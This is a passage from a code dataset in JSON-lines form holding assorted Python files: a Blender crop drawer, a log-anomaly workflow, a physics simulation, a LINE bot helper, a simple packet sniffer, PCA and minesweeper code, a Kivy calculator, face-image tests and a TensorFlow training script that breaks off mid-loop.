quad[0]\n tl = quad[1]\n tr = quad[2]\n br = quad[3]\n\n vertices = [bl, br, tl, tr]\n\n indices = ((0, 1, 2), (2, 1, 3))\n\n shader = gpu.shader.from_builtin('2D_UNIFORM_COLOR')\n batch = batch_for_shader(shader, 'TRIS', {\"pos\": vertices}, indices=indices)\n\n shader.bind()\n\n if self.clicked_quad == i:\n shader.uniform_float(\"color\", active_color)\n\n else:\n shader.uniform_float(\"color\", color)\n\n batch.draw(shader)\n","sub_path":"All_In_One/addons/VSE_Transform_Tools/operators/crop/draw_crop.py","file_name":"draw_crop.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"264639982","text":"from loglizer.vd_workflow import (csv_extractor,\n csv_block_extractor,\n splitter,\n classifier,\n time_transformer,\n valid_template,\n 
mean_std_stater,\n decimal_integrator)\n\norigin_normal_file1 = 'OpenStack/openstack_normal1.log'\norigin_normal_file2 = 'OpenStack/openstack_normal2.log'\norigin_mixed_file = 'OpenStack/openstack_abnormal.log'\ncol_header_file = 'OpenStack/OpenStack_2k.log_templates.csv'\nvalid_template_file = 'OpenStack/valid_template.pkl'\nlabel_file = 'anomaly_labels.txt'\ntrain_min = 10\nvalidate_min = 10\ntest_min = 10\ntot_syms = 23\n\ntrain_file = origin_normal_file2[: -4] + '.csv'\nvalidate_file = origin_normal_file1[: -4] + '.csv'\ntest_file = origin_mixed_file[: -4] + '.csv'\n\n# csv_block_extractor.load_label_file(label_file)\nvalid_templates = valid_template.load_valid_template(valid_template_file)\n\n# STEP 1\n# csv_extractor.csv_extracting(origin_normal_file1, col_header_file, None, 'OpenStack')\n# csv_extractor.csv_extracting(origin_normal_file2, col_header_file, None, 'OpenStack')\n# csv_extractor.csv_extracting(origin_mixed_file, col_header_file, None, 'OpenStack')\n\n# STEP 2\n# valid_templates = classifier.classify(train_file, validate_file, test_file, tot_syms,\n# train_min, validate_min, test_min, 'OpenStack')\n# valid_template.save_valid_template(valid_template_file, valid_templates)\n\n# STEP 3\n# time_transformer.transform(train_file, validate_file, test_file, valid_templates, 'OpenStack')\n\n# STEP 4\n# decimal_integrator.integrate_decimal(train_file, validate_file, test_file, valid_templates)\n\n# STEP 5\nmean_std_stater.mean_std_stat(train_file, valid_templates, 'OpenStack')\n","sub_path":"vd/workflow/OpenStack_parser.py","file_name":"OpenStack_parser.py","file_ext":"py","file_size_in_byte":1874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"379817474","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jul 20 10:06:05 2018\n\n@author: thomas\n\"\"\"\n\n#%%\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nfrom numpy.linalg import norm\n\nimport sys\nmainpath = \"/home/thomas/Documents/master_thesis/icecube_master_thesis/\"\nsys.path.insert(0, mainpath+'classes')\n\nimport photon_ensemble\nreload(photon_ensemble)\nfrom photon_ensemble import photon_ensemble, track_ensemble\n\n#%%\nseed = np.random.randint(0, 1000000)\n#seed = 12414\nnp.random.seed(seed)\n \nNphotons = 10\ninit_pos = np.array([0,0])\ninit_dir = \"random\"\npa = 0.015\nps = 0.05\ndt = 1\n\nfew_doms = 0\ncenter_doms = True\ndef create_doms(few_doms):\n \n if few_doms == None:\n return [], []\n elif few_doms:\n r = 5\n dist = 20\n DOM_centers = np.array([[dist, dist], [-dist, dist], [dist, -dist], [-dist, -dist]])\n else:\n r = 5\n dist = 50\n DOM_centers = []\n Nx = 4\n Ny = 4\n for i in range(-Nx, Nx+1):\n for j in range(-Ny,Ny+1):\n if (i, j) != (0,0):\n DOM_centers.append([i*dist, j*dist])\n DOM_centers = np.array(DOM_centers)\n \n DOM_radii = np.ones(len(DOM_centers))*r\n \n return DOM_centers, DOM_radii\n\nDOM_centers, DOM_radii = create_doms(few_doms)\nDOMs = (DOM_centers, DOM_radii)\n\nparams = {\"initial_position\":init_pos, \"initial_direction\":init_dir, \"dt\":dt, \"PS\":ps, \"PA\":pa, \"DOMs\":DOMs}\n\ninitial_direction = \"random\"\nparamsTrack = {\"initial_direction\":initial_direction, \"Pcascade\":0.05}\n\n#%%\nsave_animation = True\n\nsim = track_ensemble(Nphotons, params, **paramsTrack)\nsim.simulate()\nani = sim.run_animation(save_animation)\n\n#%%\n#sim = photon_ensemble(Nphotons, **params)\n#sim.simulate()\n\n\n#%%\n# \n#import matplotlib.animation as animation\n#def run_animation(positions_all, 
times, cascade_num, DOMs):\n# \n# def init():\n# for line in lines:\n# line.set_data([], [])\n# return lines\n#\n# def data_gen():\n# cnt = 0\n# while cnt < maxlen:\n# cnt += 1\n# xs = []\n# ys = []\n# for positions, time in zip(positions_all, times):\n#\n# if cnt-1-time > 0:\n# index = cnt-1-time\n# else:\n# index = 0\n# xs.append(positions[:index, 0])\n# ys.append(positions[:index, 1])\n# \n# yield xs, ys\n# \n# def run(data):\n# # update the data\n# xs, ys = data\n# for line, xdata, ydata in zip(lines, xs, ys):\n# line.set_data(xdata, ydata)\n# return lines\n# \n# def calculate_sizes(positions_all, times):\n# xmins, xmaxs, ymins, ymaxs, lengths = [], [], [], [], []\n# for positions, time in zip(positions_all, times):\n# xmins.append(min(positions[:, 0]))\n# xmaxs.append(max(positions[:, 0]))\n# ymins.append(min(positions[:, 1]))\n# ymaxs.append(max(positions[:, 1]))\n# lengths.append(len(positions)+time)\n# \n# return min(xmins)-10, max(xmaxs)+10, min(ymins)-10, max(ymaxs)+10, max(lengths)\n# \n# fig, ax = plt.subplots(figsize=(16,9))\n# fig.canvas.manager.window.activateWindow()\n# fig.canvas.manager.window.raise_()\n## circles = initialize_DOMs()\n# for i in range(len(DOMs[0])):\n# c = plt.Circle(DOMs[0][i], DOMs[1][i], fc=\"white\", ec=\"blue\")\n# ax.add_artist(c)\n# \n# ax.grid()\n# color_list = plt.cm.tab20c(np.linspace(0, 1, len(np.unique(cascade_num))))\n# lines = []\n# for index in range(len(positions_all)):\n# if index != len(positions_all)-1:\n# print index, len(color_list), len(cascade_num), cascade_num[index]\n# print color_list[cascade_num[index]]\n# print \n# lobj = ax.plot([],[],lw=2,color=color_list[cascade_num[index]])[0]\n# lines.append(lobj)\n# else:\n# lobj = ax.plot([],[],lw=3,color=\"black\")[0]\n# lines.append(lobj) \n#\n# xmin, xmax, ymin, ymax, maxlen = calculate_sizes(positions_all, times) \n# ax.set_ylim(ymin, ymax)\n# ax.set_xlim(xmin, xmax)\n# \n# ani = animation.FuncAnimation(fig, run, data_gen, blit=True, interval=50,\n# repeat=False, init_func=init, save_count=maxlen)\n# if save_animation:\n# Writer = animation.writers['ffmpeg']\n# writer = Writer(fps=25, metadata=dict(artist='Me'), bitrate=1800)\n# ani.save('track.mp4', writer=writer)\n# \n# return ani\n#\n\n#casc_positions = sim.cascade_positions\n#casc_times = sim.cascade_times\n#positions_all = []\n#times = []\n#cascade_num = []\n#for i, position in enumerate(casc_positions):\n# for j in range(position.shape[1]):\n# pos = position[:,j,:]\n# positions_all.append(pos)\n# times.append(casc_times[i])\n# cascade_num.append(i)\n#\n#positions_track = np.array(sim.positions)\n#positions_all.append(positions_track)\n#times.append(0)\n#\n##%%\n#\n#ani = run_animation(positions_all, times, cascade_num, DOMs)","sub_path":"reconstruction/ensemble_track.py","file_name":"ensemble_track.py","file_ext":"py","file_size_in_byte":5093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"137168910","text":"from django.http import HttpResponse\nfrom django.views.decorators.csrf import csrf_exempt\nimport urllib.request\nimport json\nwith open('line.json') as line:\n line_json = json.load(line)\nACCESSTOKEN = line_json['ACCESSTOKEN']\n\nREPLY_ENDPOINT_URL = \"https://api.line.me/v2/bot/message/reply\"\n\nHEADER = {\n 'Content-Type': 'application/json',\n 'Authorization': 'Bearer ' + ACCESSTOKEN\n}\n\nclass LineMessage():\n def __init__(self, messages):\n self.messages = messages\n\n def reply(self, reply_token):\n body = {\n 'replyToken': reply_token,\n 'messages': 
self.messages\n }\n print(body)\n req = urllib.request.Request(REPLY_ENDPOINT_URL, json.dumps(body).encode(), HEADER)\n try:\n with urllib.request.urlopen(req) as res:\n body = res.read()\n except urllib.error.HTTPError as err:\n print(err)\n except urllib.error.URLError as err:\n print(err.reason)","sub_path":"line_bot_ai/line_message.py","file_name":"line_message.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"388361449","text":"from socket import *\nimport struct\n\ns = socket(AF_INET, SOCK_RAW, IPPROTO_TCP)\n\nnumber = 1\nwhile 1:\n print(\"Number: \", number)\n data = s.recvfrom(65565)\n packet = data[0]\n address = data[1]\n header = struct.unpack('!BBHHHBBHBBBBBBBB', packet[:20])\n if header[6] == 6:\n print(\"Protocol: TCP\")\n elif header[6] == 17:\n print(\"Protocol: UDP\")\n elif header[6] == 1:\n print(\"Protocol: ICMP\") \n print(\"Address: \", address)\n print(\"Data: \", data)\n number = number + 1\n","sub_path":"sniffer.py","file_name":"sniffer.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"459642728","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Date : 2016-04-10 11:43:54\n# @Author : Your Name (you@example.org)\n# @Link : http://example.org\n# @Version : $Id$\n \nimport numpy as np \nimport matplotlib.pyplot as plt\n \ndef PCA(dataMat,topNfeat=5):\n#topNfeat=5 keeps the five largest eigenvalues by default\n#subtract the mean \n meanVals = np.mean(dataMat,axis = 0)\n dataMean = dataMat - meanVals\n#compute the covariance matrix \n conMat = dataMean.T.dot(dataMean)\n#compute the eigenvalues and eigenvectors\n eigVals,eigVects = np.linalg.eig(conMat) \n#sort the eigenvalues \n eigValInd = np.argsort(eigVals)\n #eigValInd lists indices into the original array, ordered from smallest to largest eigenvalue\n #x = np.array([3, 1, 2])\n #np.argsort(x)\n #array([1, 2, 0])\n #ascending order is 1,2,3; 1 sits at index 1, 2 at index 2, 3 at index 0\n eigValInd = eigValInd[:-(topNfeat+1):-1]\n #reversed: keep the top topNfeat eigenvalues, from largest to smallest\n#drop the unneeded eigenvectors\n redeigVects=eigVects[:,eigValInd] \n#project the data onto the new basis\n lowdataMat = dataMean.dot(redeigVects)\n#reconstruct the data from the low-dimensional projection\n condata = (lowdataMat.dot(redeigVects.T)) + meanVals\n#return the reduced data with the mean added back\n #the reduced data is one-dimensional here, so only the overall mean of dataMat can be added back\n reducedata=lowdataMat+np.mean(dataMat)\n return reducedata,condata\n#100 samples\nN=100\nx=np.linspace(2,4,N)\ny=x+2-4\n \nx1=x+(np.random.rand(N)-0.5)*1.5\ny1=y+(np.random.rand(N)-0.5)*1.5\n \ndata = np.array([x1,y1])\nprint(data.T.shape)\na,b=PCA(data.T,1)\n\nplt.plot(x,y,color='g',linestyle='-',marker='',label='ideal')\nplt.plot(x1,y1,color='b',linestyle='',marker='.',label='datawithnoise')\nplt.plot(b[:,0],b[:,1],color='r',linestyle='',marker='.',label=u'recon curve')\nplt.plot(a[:,0],np.zeros(N),color='k',linestyle='',marker='*',label=u'low dim data')\n#plot the reduced data along the x-axis, with y fixed at 0 via np.zeros(N)\n \nplt.legend(loc='upper left')\nplt.axis('equal')\n \nplt.show()","sub_path":"gravlen/manga/codes/testpca.py","file_name":"testpca.py","file_ext":"py","file_size_in_byte":1984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"103770392","text":"import random\n\n# START of External Values\n\n# set_flag flag enum:\n# FLAG_EMPTY\n# FLAG_BOMB\n# FLAG_UNKNOWN\n# FLAG_TOGGLE (EMPTY -> BOMB -> UNKNOWN -> EMPTY)\n\n# additional flag enum:\n# FLAG_TRIGGERED\n\n# status enum:\n# STATUS_READY\n# STATUS_WIN\n# STATUS_LOSE\n\n# status dict: {\n# \"status\" : STATUS_XXX,\n# \"rows\" : 123,\n# \"columns\" : 456,\n# \"bombs\" : 71\n# \"triggers\" : 23,\n# \"remains\" : 48,\n# \"flags\" : 12,\n# }\n\n# END of External Values\n\n\n# 
START of Internal Values\n\n# Board enum:\n# 0 - Mine (Empty)\n# 1 - Bomb\n\n# Internal flag enum:\n# 0 - Empty\n# 1 - Bomb\n# 2 - Unknown\n# 3 - Triggered\n\n# END of Internal Values\n\nclass Mines(object):\n BOARD_EMPTY = 0\n BOARD_BOMB = 1\n\n FLAG_EMPTY = 0\n FLAG_BOMB = 1\n FLAG_UNKNOWN = 2\n FLAG_TRIGGERED = 3\n\n FLAG_TOGGLE = 3\n\n STATUS_READY = 0\n STATUS_WIN = 1\n STATUS_LOSE = 2\n\n def __init__(self):\n self.initialize(16, 16, 7)\n\n def initialize(self, rows, columns, bombs):\n assert rows > 3 and columns > 3 and bombs > 0 and bombs <= (rows * columns - 9)\n\n self.__rows = rows\n self.__columns = columns\n self.__bombs = bombs\n self.__triggers = 0\n\n self.__board = [[self.BOARD_EMPTY for j in range(columns + 2)] for i in range(rows + 2)]\n self.__flags = [[self.FLAG_EMPTY for j in range(columns + 2)] for i in range(rows + 2)]\n self.__flag_bombs = 0\n self.__randomize()\n\n self.__status = self.STATUS_READY\n\n def trigger(self, row, col, func):\n assert self.__status == self.STATUS_READY\n assert self.valid_coor(row, col)\n\n if self.triggered(row, col):\n rv = self.__trigger_surround(row, col, func)\n else:\n rv = self.__trigger_dfs(row, col, func)\n\n if rv <= 0:\n return rv\n\n self.__triggers += rv\n if self.__triggers >= self.__columns * self.__rows - self.__bombs:\n self.__status = self.STATUS_WIN\n return rv\n\n def triggered(self, row, col):\n assert self.valid_coor(row, col)\n\n return self.__flags[row][col] == self.FLAG_TRIGGERED\n\n def set_flag(self, row, col, flag):\n assert self.__status == self.STATUS_READY\n assert self.valid_coor(row, col)\n assert flag >= 0 and flag <= self.FLAG_TOGGLE\n\n if self.triggered(row, col):\n return 0\n\n if self.__flags[row][col] == self.FLAG_BOMB:\n self.__flag_bombs -= 1\n\n if flag == self.FLAG_TOGGLE:\n self.__flags[row][col] += 1\n if self.__flags[row][col] >= self.FLAG_TOGGLE:\n self.__flags[row][col] = self.FLAG_EMPTY\n rv = self.__flags[row][col]\n else:\n self.__flags[row][col] = flag\n rv = flag\n\n if rv == self.FLAG_BOMB:\n self.__flag_bombs += 1\n\n return rv\n\n def get_number(self, row, col):\n assert self.valid_coor(row, col)\n\n if self.__board[row][col] == self.BOARD_BOMB:\n return -1\n\n rv = 0\n for i in range(-1, 2):\n for j in range(-1, 2):\n rv += self.__board[row + i][col + j]\n\n return rv\n\n def get_flag(self, row, col):\n assert self.valid_coor(row, col)\n\n return self.__flags[row][col]\n\n def get_status(self):\n return {\n \"status\" : self.__status,\n \"rows\" : self.__rows,\n \"columns\" : self.__columns,\n \"bombs\" : self.__bombs,\n \"triggers\" : self.__triggers,\n \"remains\" : self.__rows * self.__columns - self.__bombs - self.__triggers,\n \"flags\" : self.__flag_bombs,\n }\n\n def valid_coor(self, row, col):\n return row > 0 and col > 0 and row <= self.__rows and col <= self.__columns\n\n def __trigger_dfs(self, row, col, func):\n if not self.valid_coor(row, col):\n return 0\n if self.triggered(row, col):\n return 0\n if self.__flags[row][col] != self.FLAG_EMPTY:\n return 0\n # Now we really trigger it\n if self.__board[row][col] == self.BOARD_BOMB:\n # BOMB!\n self.__status = self.STATUS_LOSE\n return -1\n elif self.get_number(row, col) == 0:\n return self.__expand_dfs(row, col, func)\n else:\n self.__flags[row][col] = self.FLAG_TRIGGERED\n func(row, col, self.get_number(row, col))\n return 1\n\n def __expand_dfs(self, row, col, func):\n if not self.valid_coor(row, col):\n return 0\n if self.triggered(row, col):\n return 0\n rv = 1\n self.__flags[row][col] = self.FLAG_TRIGGERED\n 
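# The cell is flagged TRIGGERED before recursing, so neighbouring recursive\n # calls see it as already visited and the flood fill terminates.\n 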
func(row, col, 0)\n if self.get_number(row, col) != 0:\n return 1\n for i in range(-1, 2):\n for j in range(-1, 2):\n rv += self.__expand_dfs(row + i, col + j, func)\n return rv\n\n def __randomize(self):\n for i in range(self.__bombs):\n ok = False\n while not ok:\n row = random.randint(1, self.__rows)\n col = random.randint(1, self.__columns)\n if self.__board[row][col] == self.BOARD_EMPTY:\n self.__board[row][col] = self.BOARD_BOMB\n ok = True\n\n def __trigger_surround(self, row, col, func):\n num = self.get_number(row, col)\n assert num >= 0\n\n if num == 0:\n return 0\n\n bombs = 0\n for i in range(-1, 2):\n for j in range(-1, 2):\n if not self.valid_coor(row + i, col + j):\n continue\n fl = self.get_flag(row + i, col + j)\n if fl == self.FLAG_BOMB:\n bombs += 1\n elif fl == self.FLAG_UNKNOWN:\n bombs = -255\n if bombs != num:\n return 0\n\n rv = 0\n for i in range(-1, 2):\n for j in range(-1, 2):\n if not self.valid_coor(row + i, col + j):\n continue\n a = self.__trigger_dfs(row + i, col + j, func)\n if a < 0:\n return a\n rv += a\n return rv\n","sub_path":"mines.py","file_name":"mines.py","file_ext":"py","file_size_in_byte":6209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"164688535","text":"#Imports\nimport kivy #Kivy 1.10.1\nfrom kivy.app import App\n\nfrom kivy.base import runTouchApp\nfrom kivy.clock import Clock\nfrom kivy.factory import Factory\n\nfrom kivy.uix.gridlayout import GridLayout\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.uix.widget import Widget\nfrom kivy.uix.button import Button\nfrom kivy.uix.textinput import TextInput\nfrom kivy.properties import NumericProperty\n#End Imports\n\n#Global Functions\ndef is_digit(var):\n return var.isdigit()\n\ndef get_num(varstr):\n s = \"\"\n if varstr[0] == '-':\n s += \"-\"\n varstr = varstr[1:]\n for c in varstr:\n if not is_digit(c) and c != '.':\n break\n s += c\n return(float(s), len(s))\n\ndef perform_operation(st,stack):\n print(stack)\n i = stack.index(st)\n n2 = stack.pop(i+1)\n n1 = stack.pop(i-1)\n if st == '^': stack[i-1] = n1 ** n2\n elif st == '*': stack[i-1] = n1 * n2\n elif st == '/': stack[i-1] = n1 / n2\n elif st == '+': stack[i-1] = n1 + n2\n elif st == '-': stack[i-1] = n1 - n2\n\n print(\"{} {} {} = {}\".format(n1,st,n2,stack[i-1]))\n\ndef eval_math_expr(expr):\n\n n, end_n = get_num(expr)\n expr_list = [n]\n expr = expr[end_n:]\n\n while expr:\n expr_list.append(expr[0])\n expr = expr[1:]\n n, end_n = get_num(expr)\n expr_list.append(n)\n expr = expr[end_n:]\n\n while len(expr_list) > 1:\n if '^' in expr_list:\n perform_operation('^',expr_list)\n\n else:\n if '*' in expr_list: perform_operation('*',expr_list)\n elif '/' in expr_list: perform_operation('/',expr_list)\n\n else:\n if '+' in expr_list: perform_operation('+',expr_list)\n elif '-' in expr_list: perform_operation('-',expr_list)\n\n output = expr_list[0]\n return str(output)\n\n#Button Classes\nclass Btn(Button):\n def __init__(self, **kwargs):\n super(Btn,self).__init__(**kwargs)\n self.font_size = self.height * 2 / 3\n\n __events__ = ('on_long_press', )\n\n long_press_time = Factory.NumericProperty(1)\n\n def on_state(self, instance, value):\n if value == 'down':\n lpt = self.long_press_time\n self._clockev = Clock.schedule_once(self._do_long_press, lpt)\n else:\n self._clockev.cancel()\n\n def _do_long_press(self, dt):\n self.dispatch('on_long_press')\n\n def on_press(self):\n self.parent.parent.parent.ids.calc_input.text += self.text\n\n def on_long_press(self, *largs):\n 
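# Long presses are a no-op on plain buttons; SpecialBtns overrides this to\n # clear the whole input when 'del' is held.\n 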
pass\n\nclass SpecialBtns(Btn):\n def __init__(self, **kwargs):\n super(SpecialBtns,self).__init__(**kwargs)\n\n def on_press(self):\n if self.text == '=':\n self.parent.parent.parent.calculate()\n\n elif self.text == 'del':\n self.parent.parent.parent.ids.calc_input.text = self.parent.parent.parent.ids.calc_input.text[:-1]\n\n def on_long_press(self):\n if self.text == 'del':\n self.parent.parent.parent.ids.calc_input.text = ''\n\nclass EqWindow(TextInput):\n def __init__(self, **kwargs):\n super(EqWindow,self).__init__(**kwargs)\n self.font_size = self.height\n self.size_hint = 1, 0.2\n self.multiline = False\n self.padding = [10, self.height / 4, 10, 10]\n\nclass InterfaceLayout(BoxLayout):\n def __init__(self, **kwargs):\n super(InterfaceLayout, self).__init__(**kwargs)\n\n number_grid = GridLayout(cols=3)\n for i in range(10):\n number_grid.add_widget(Btn(text = str(i)))\n number_grid.add_widget(Btn(text = '.'))\n number_grid.add_widget(SpecialBtns(text = '='))\n\n operator_grid = GridLayout(rows = 5)\n operator_grid.add_widget(SpecialBtns(text = 'del',))\n for i in '+-/*':\n operator_grid.add_widget(Btn(text = str(i)))\n\n\n self.add_widget(number_grid)\n self.add_widget(operator_grid)\n number_grid.size_hint = 0.8, 1\n operator_grid.size_hint = 0.2, 1\n\nclass CalculatorWidget(GridLayout):\n\n def calculate(self, *args):\n input = self.ids.calc_input.text\n output = eval_math_expr(input)\n self.ids.calc_input.text = str(output)\n\nclass CalcApp(App):\n def build(self):\n root = CalculatorWidget()\n return root\n\nif __name__ == \"__main__\":\n interactive = True\n if interactive:\n CalcApp().run()\n else:\n eval_math_expr('1^3-3*2/2+2')\n eval_math_expr('2.0^3*10/2-45+2')\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"289729935","text":"\nimport random\nimport numpy as np\nimport os\nimport matplotlib.pyplot as plt\nfrom skimage.feature import hog\n\nfrom orl_face_dataset_examples.read_pgm_file import fetch_sw_orl\nfrom sw_path import WORK_ROOT\nfrom sw_utils.functions import show_class_images\n\ncontrol = [False, False, True]\n\n\nORL_PATH = os.path.join(WORK_ROOT, 'RES', 'ORL')\n\nb = fetch_sw_orl()\n\nif control[0]:\n print(f'the data set is {b.DESCR}')\n print(f'the data is located at {b.path}')\n\n data_shape = b.shape\n data_size = b.data.size\n print(f'The shape of the data is {data_shape}, that is there are {data_size} number of images')\n\nif control[1]:\n img = np.array(b.data[random.randint(0, 400 - 1)].reshape(data_shape))\n plt.imshow(img, cmap='gray')\n plt.show()\n fd, hog_img = hog(img, orientations=8, pixels_per_cell=(16, 16), cells_per_block=(1, 1), visualize=True,\n multichannel=False)\n plt.imshow(hog_img)\n plt.show()\n\n hog_fd = []\n for img in b.data:\n if data_size == len(img):\n fd = hog(np.array(img).reshape(data_shape), orientations=8, pixels_per_cell=(16, 16), cells_per_block=(1, 1),\n visualize=False, multichannel=False)\n\n\nif control[2]:\n show_class_images(b, 's33')\n","sub_path":"orl_face_dataset_examples/test_reading_pgm.py","file_name":"test_reading_pgm.py","file_ext":"py","file_size_in_byte":1245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"361144112","text":"\"\"\"\nGiven a filename create a defoe.fmp.archive.Archive.\n\"\"\"\n\nfrom defoe.fmp.archive import Archive\n\n\ndef filename_to_object(filename):\n \"\"\"\n Given a filename create a 
defoe.fmp.archive.Archive. If an error\n arises during its creation this is caught and returned as a\n string.\n\n :param filename: filename\n :type filename: str or unicode\n :return: tuple of form (Archive, None) or (filename, error message),\n if there was an error creating Archive\n :rtype: tuple(defoe.fmp.archive.Archive | str or unicode, str or unicode)\n \"\"\"\n try:\n result = (Archive(filename), None)\n except Exception as exception:\n result = (filename, str(exception))\n return result\n","sub_path":"defoe/fmp/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"310563958","text":"from selenium import webdriver\nimport time as t\n\nbrowser = webdriver.Chrome()\n\nbrowser.get(\"https://yandex.ru\")\n\nbrowser.execute_script(\"prompt('Hello Selenium')\")\nt.sleep(5)\nbrowser.switch_to.alert.dismiss()\nt.sleep(2)\nbrowser.quit()\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"4070235","text":"import os\nimport numpy as np\nimport tensorflow as tf\nimport pandas as pd \n\n############################## PRE-TRAINING ##############################\ndef split_data(X,Y,length=0.8):\n\tl = int(len(Y)*length)\n\txtr, ytr = X[:l],pd.get_dummies(Y[:l])\n\txte, yte = X[l:],pd.get_dummies(Y[l:])\n\treturn xtr,ytr,xte,yte\n\ndef next_batch(x,y,i,batchSize):\n\tif i == 0:\n\t\txbs, ybs = x[:batchSize], y[:batchSize]\n\telse:\n\t\ts = i*batchSize\n\t\te = s+batchSize+1\n\t\tif e > len(x):\n\t\t\txbs, ybs = x[s:], y[s:]\n\t\telse:\n\t\t\txbs, ybs = x[s:e], y[s:e]\n\treturn xbs,ybs\n\n############################## TRAINING ##############################\n# Generate the weights and biases for each layer \ndef create_weights_biases(n_input,n_classes,feature=256,h=2):\n\tweight,biases={},{}\n\tfor i in range(1,h+1):\n\t\tif i == 1:\n\t\t\tweight.update({'h'+str(i):tf.Variable(tf.random_normal([n_input,feature]))})\n\t\t\tbiases.update({'h'+str(i):tf.Variable(tf.random_normal([feature]))})\n\t\telse:\n\t\t\tweight.update({'h'+str(i):tf.Variable(tf.random_normal([feature,feature]))})\n\t\t\tbiases.update({'h'+str(i):tf.Variable(tf.random_normal([feature]))})\n\tweight.update({'out':tf.Variable(tf.random_normal([feature,n_classes]))})\n\tbiases.update({'out':tf.Variable(tf.random_normal([n_classes]))})\n\treturn weight,biases\n\n# Create multilayer perceptron with N hidden layer\ndef multilayer_perceptron(x, weights, biases, dropout):\n\tlayer = len(weights.keys())\n\thidden_layer = None\n\t# hidden layer with RELU activation\n\tfor i in range(1,layer):\n\t\tname = 'h'+str(i)\n\t\tif i == 1:\n\t\t\thidden_layer = tf.add(tf.matmul(x,weights[name]),biases[name])\n\t\telse:\n\t\t\thidden_layer = tf.add(tf.matmul(hidden_layer,weights[name]),biases[name])\n\t\thidden_layer = tf.nn.relu(hidden_layer)\n\t\thidden_layer = tf.nn.dropout(hidden_layer, dropout)\n\t# Output layer with linear activation\n\treturn tf.matmul(hidden_layer, weights['out']) + biases['out']\n\n# Creating the train session\n# dp - dropout, f - features in hidden layer, h - hidden layer, lr - learning rate, \n# e_acc - expected accuracy, tp - total epoch, bs - batch size, ds - display step, \n# rdn - random sampling, end - to end cycle, load - load save model\ndef train_session(X,Y,n_input,n_classes,dp=.75,f=256,\n\t\t\t\t h=2,lr=0.001,e_acc=.75,tp=10,bs=10,ds=1,\n\t\t\t\t 
rdn=1.,end=200,load=False):\n\t# Spliting the data set into train and test\n\ttrain_x,train_y,test_x,test_y=split_data(X,Y)\n\tsample = int(len(train_x)*rdn)\n\t# Placeholder for x,y\n\tx = tf.placeholder(tf.float32,[None,n_input])\n\ty = tf.placeholder(tf.float32,[None,n_classes])\n\tkeep_prob = tf.placeholder(tf.float32)\n\t# Create the weights and biases\n\tweights, biases = create_weights_biases(n_input,n_classes,feature=f,h=h)\n\t\n\tpred = multilayer_perceptron(x,weights,biases,keep_prob)\n\t# loss function\n\tcost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=pred,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t labels=y))\n\t# optimizing function and minimizing with the loss funciton\n\toptimizer = tf.train.AdamOptimizer(learning_rate=lr).minimize(cost)\n\t#Test Model\n\tcorrect_prediction = tf.equal(tf.argmax(pred, 1), tf.argmax(y,1))\n\t# Calculate accuracy\n\taccuracy = tf.reduce_mean(tf.cast(correct_prediction, 'float'))\n\t\n\tinit = tf.global_variables_initializer()\n\n\tsaver = tf.train.Saver()\n\t\n\t# Initializing the variables\n\twith tf.Session() as sess:\n\t\tsess.run(init)\n\t\t# Load a save model\n\t\tif load:\n\t\t\tsaver = tf.train.import_meta_graph('model/model.meta')\n\t\t\tsaver.restore(sess, 'model/model')\n\t\t\tprint ('Model Loaded')\n\n\t\tprint ('Starting Training Session')\n\t\t#training cycle\n\t\ttotal_acc = []\n\t\tt_acc = 0.\n\t\tepoch = 0\n\t\twhile True:\n\t\t\tif rdn < 1:\n\t\t\t\tind = train_x.sample(n=sample).index\n\t\t\t\tx_sam = train_x.loc[ind].reset_index(drop=True)\n\t\t\t\ty_sam = train_y.loc[ind].reset_index(drop=True)\n\t\t\telse:\n\t\t\t\tx_sam,y_sam = train_x,train_y\n\t\t\ttotal_batch = int(len(x_sam)/bs)\n\t\t\t#loop over all batch \n\t\t\tfor i in range(total_batch):\n\t\t\t\tbatch_x, batch_y = next_batch(x_sam,y_sam,i,bs)\n\t\t\t\t# Run optimization op (backprop) \n\t\t\t\tsess.run(optimizer,feed_dict={x:batch_x,y:batch_y,keep_prob:dp})\n\t\t\tif epoch % ds == 0:\n\t\t\t\t# calculate batch loss and accuracy\n\t\t\t\tloss, acc = sess.run([cost,accuracy],feed_dict={x:batch_x,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\ty:batch_y,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tkeep_prob:1.})\n\t\t\t\ttotal_acc.append(acc)\n\t\t\t\tprint ('Epoch:', '%04d'%(epoch+1),'Loss =', \n\t\t\t\t\t '{:.6f}'.format(loss),\n\t\t\t\t\t 'Accuracy =','{:.5f}'.format(acc))\n\t\t\tif epoch > tp and epoch % tp == 0:\n\t\t\t\tt_acc = np.mean(np.array(total_acc))\n\t\t\t\tif t_acc > e_acc:\n\t\t\t\t\tbreak\n\t\t\tif epoch >= end:\n\t\t\t\tbreak\n\t\t\tepoch += 